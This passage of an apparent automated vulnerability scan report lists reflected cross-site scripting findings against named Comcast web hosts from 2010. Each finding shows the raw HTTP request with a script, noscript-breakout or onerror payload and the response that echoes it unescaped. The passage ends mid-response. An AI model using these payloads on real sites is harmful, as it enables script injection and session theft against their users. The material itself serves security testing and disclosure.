The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9ebcc<script>alert(1)</script>7145250d0fb was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login9ebcc<script>alert(1)</script>7145250d0fb/authForward.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:24 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLGJ0t925k4LGfzSv9KJgLZvp8GSmvK2Qm17zLpwB3gMqb8SNT2!1440925265!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation/pageflows/Login9ebcc<script>alert(1)</script>7145250d0fb/authForward</td>
...[SNIP]...

2.34. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b5e48<script>alert(1)</script>3f458fc69de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/comb5e48<script>alert(1)</script>3f458fc69de/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:07:48 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTJ0n7bqgh3SCLdr8Bl4nTXbxcrJJS3WwGhnRXMpBgtG0hqnGpTG!1720433980!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>comb5e48<script>alert(1)</script>3f458fc69de/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile</td>
...[SNIP]...

2.35. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6cace<script>alert(1)</script>b153324f0b2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast6cace<script>alert(1)</script>b153324f0b2/online/dvp/presentation/pageflows/Login/retrieveProfile.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:07:48 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTJ0p52J2YLphJQzvjn6FTv1cp2bRWLnzMwwRS13gQwSVJQJBLv5!255318197!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast6cace<script>alert(1)</script>b153324f0b2/online/dvp/presentation/pageflows/Login/retrieveProfile</td>
...[SNIP]...

2.36. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c0534<script>alert(1)</script>172078c0b3d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/onlinec0534<script>alert(1)</script>172078c0b3d/dvp/presentation/pageflows/Login/retrieveProfile.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:07:49 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTJ1CdjbT1DwVJxRtccGHqvK10Lst22t7mG6J4pqHP91jQ1xpMVn!715189861!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/onlinec0534<script>alert(1)</script>172078c0b3d/dvp/presentation/pageflows/Login/retrieveProfile</td>
...[SNIP]...

2.37. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 92a58<script>alert(1)</script>bc3efa62431 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp92a58<script>alert(1)</script>bc3efa62431/presentation/pageflows/Login/retrieveProfile.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:07:50 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTJ2XPTsT4v53gHrGvVkMdxdJxJvWFDBJDbpvMdTMvDFQ2kpwpyW!739888278!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp92a58<script>alert(1)</script>bc3efa62431/presentation/pageflows/Login/retrieveProfile</td>
...[SNIP]...

2.38. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 6575b<script>alert(1)</script>7a29b212314 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation6575b<script>alert(1)</script>7a29b212314/pageflows/Login/retrieveProfile.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:07:50 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTJ2KBT12YyTvcKwnw25vN2nJLrsGFPfhDWwhDnxL2crXn7cSmR7!96692442!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation6575b<script>alert(1)</script>7a29b212314/pageflows/Login/retrieveProfile</td>
...[SNIP]...

2.39. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 9ef06<script>alert(1)</script>9e07f1fca61 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows9ef06<script>alert(1)</script>9e07f1fca61/Login/retrieveProfile.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:07:51 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTJ3N1q4GLJdLQygnB9hvpMH2PtXsK6TvZjqKg4MJvDQWfzgvzTZ!-794401224!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation/pageflows9ef06<script>alert(1)</script>9e07f1fca61/Login/retrieveProfile</td>
...[SNIP]...

2.40. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b6da7<script>alert(1)</script>89a6fcaa71e was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Loginb6da7<script>alert(1)</script>89a6fcaa71e/retrieveProfile.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:07:51 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTJ4bZFGbpQFyZhzMWdTJNg5Hqlj6nplKLpGWGBG52GV6mRKl4n3!1431461321!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation/pageflows/Loginb6da7<script>alert(1)</script>89a6fcaa71e/retrieveProfile</td>
...[SNIP]...

2.41. http://games.comcast.net/product_webgame.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /product_webgame.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload cf871</noscript><script>alert(1)</script>4d1710b7efc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /product_webgame.phpcf871</noscript><script>alert(1)</script>4d1710b7efc HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:07:59 GMT
Server: Apache
Set-Cookie: ssid=l660jf072c1iro0jfao7h6jer0; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:07:59 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:07:59 GMT; path=/
Content-Length: 622
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=1124116672.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /product_webgame.phpcf871</noscript><script>alert(1)</script>4d1710b7efc was not found on this server.</p>
...[SNIP]...

2.42. http://games.comcast.net/product_webgame.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /product_webgame.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between NOSCRIPT tags. The payload b01e2</noscript><script>alert(1)</script>694556b43e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /product_webgame.php/b01e2</noscript><script>alert(1)</script>694556b43e4 HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:07:58 GMT
Server: Apache
Set-Cookie: ssid=usip5la3bnjejo41vpfbf4gv61; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:07:58 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:07:58 GMT; path=/
Content-Length: 623
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=1107339456.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /product_webgame.php/b01e2</noscript><script>alert(1)</script>694556b43e4 was not found on this server.</p>
...[SNIP]...

2.43. http://games.comcast.net/t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload 3d790</noscript><script>alert(1)</script>7026214fdcc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /3d790</noscript><script>alert(1)</script>7026214fdcc/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:08:22 GMT
Server: Apache
Set-Cookie: ssid=dm4oq6gddukhq03ff53cru3dh1; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:22 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:22 GMT; path=/
Content-Length: 681
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=1124116672.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /3d790</noscript><script>alert(1)</script>7026214fdcc/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html was not found on this server.</p>
...[SNIP]...

2.44. http://games.comcast.net/t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 629ec"><img%20src%3da%20onerror%3dalert(1)>3d0a426c30 was submitted in the REST URL parameter 1. This input was echoed as 629ec"><img src=a onerror=alert(1)>3d0a426c30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /t_03cm629ec"><img%20src%3da%20onerror%3dalert(1)>3d0a426c30/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:11 GMT
Server: Apache
Set-Cookie: ssid=apef68r0bna5m4av39ircrrjh5; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:11 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:11 GMT; path=/
Set-Cookie: affiliate_code=t_03cm629ec%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E3d0a426c30; expires=Fri, 17-Jun-2011 18:08:11 GMT; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=570534080.20480.0000; path=/
Content-Length: 29905

   
                                                                                                                                                                                                                                                                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtm
...[SNIP]...
<a onclick="passReport('download');" href="http://d.trymedia.com/d/ftag/dip_nt_en/t_03cm629ec"><img src=a onerror=alert(1)>3d0a426c30/VictorianMysteries_WiW.rga?curr_selected=USD&lang=en" class="dlFirst button">
...[SNIP]...

2.45. http://games.comcast.net/t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s-1_1054_15254/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload 3f34f</noscript><script>alert(1)</script>d734ce584e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /t_03cm/s-1_1054_152543f34f</noscript><script>alert(1)</script>d734ce584e1/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:08:43 GMT
Server: Apache
Set-Cookie: ssid=lpsscof3a2tsmp7o30vko4vvl5; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:08:44 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:08:44 GMT; path=/
Content-Length: 687
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=570534080.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /t_03cm/s-1_1054_152543f34f</noscript><script>alert(1)</script>d734ce584e1/AllGames/Hidden-Object/Victorian-Mysteries-Woman-in-White.html was not found on this server.</p>
...[SNIP]...

2.46. http://games.comcast.net/t_03cm/s1/DownloadableGames [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1/DownloadableGames

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ffd8"><img%20src%3da%20onerror%3dalert(1)>9464f5786ed was submitted in the REST URL parameter 1. This input was echoed as 5ffd8"><img src=a onerror=alert(1)>9464f5786ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /t_03cm5ffd8"><img%20src%3da%20onerror%3dalert(1)>9464f5786ed/s1/DownloadableGames HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:09:12 GMT
Server: Apache
Set-Cookie: ssid=qb2rqr3dv4la5or8978jl0edt0; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:09:12 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:09:12 GMT; path=/
Set-Cookie: affiliate_code=t_03cm5ffd8%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9464f5786ed; expires=Fri, 17-Jun-2011 18:09:12 GMT; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=604088512.20480.0000; path=/
Content-Length: 71040

   
                                                                                                                                                                                                                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-stri
...[SNIP]...
<img src="http://cdn.media.trymedia.com/affiliate-files/t_03cm5ffd8"><img src=a onerror=alert(1)>9464f5786ed/images/GPpromo.gif" alt="GamePass - Get a FREE Game Now! Sign up for GamePass and receive a FREE game now, a FREE game every month and $5 off all additional GamePass games!" />
...[SNIP]...

2.47. http://games.comcast.net/t_03cm/s1/DownloadableGames [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1/DownloadableGames

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload bc143</noscript><script>alert(1)</script>eef9c1bbfed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /bc143</noscript><script>alert(1)</script>eef9c1bbfed/s1/DownloadableGames HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:09:53 GMT
Server: Apache
Set-Cookie: ssid=kg24oua210erku2s7qg3rvkr76; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:09:53 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:09:53 GMT; path=/
Content-Length: 624
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=604088512.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /bc143</noscript><script>alert(1)</script>eef9c1bbfed/s1/DownloadableGames was not found on this server.</p>
...[SNIP]...

2.48. http://games.comcast.net/t_03cm/s1/DownloadableGames [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s1/DownloadableGames

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload b97f0</noscript><script>alert(1)</script>63f4f408e40 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /t_03cm/s1b97f0</noscript><script>alert(1)</script>63f4f408e40/DownloadableGames HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:10:07 GMT
Server: Apache
Set-Cookie: ssid=lj62dj8ljo6i9b7n8stg34sr70; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:10:07 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:10:07 GMT; path=/
Content-Length: 630
Connection: close
